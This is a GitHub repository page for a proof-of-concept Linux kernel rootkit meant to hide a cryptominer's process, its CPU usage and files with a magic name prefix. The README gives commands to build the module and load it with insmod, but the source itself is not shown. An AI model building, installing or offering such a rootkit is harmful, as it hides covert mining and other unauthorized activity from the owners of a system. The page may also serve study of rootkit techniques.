Skip to content

littlAcen/hiding-cryptominers-linux-rootkit

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits
khook
khook
 
 
Kbuild
Kbuild
 
 
LICENSE
LICENSE
 
 
Makefile
Makefile
 
 
README.md
README.md
 
 
main.c
main.c
 
 
main.h
main.h
 
 

Repository files navigation

hiding-cryptominers-linux-rootkit

Related post: https://alfon.xyz/posts/hiding-cryptominers-linux

Features

  • Hide process
  • Hide process CPU usage
  • Hide files that his filename starts with the MAGIC_PREFIX

Rootkit installation

Build

$ git clone https://github.com/alfonmga/hiding-cryptominers-linux-rootkit
$ cd hiding-cryptominers-linux-rootkit/
$ make

Loading LKM:

$ dmesg -C # clears all messages from the kernel ring buffer
$ insmod rootkit.ko
$ dmesg # verify that rootkit has been loaded

Unloading LKM:

$ rmmod rootkit
$ dmesg # verify that rootkit has been unloaded

About

Linux rootkit POC to hide a crypto miner's process and CPU usage.

alfon.xyz/posts/hiding-cryptominers-linux

Resources

Readme

License

Unlicense license
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • C 91.8%
  • Assembly 5.0%
  • Makefile 3.2%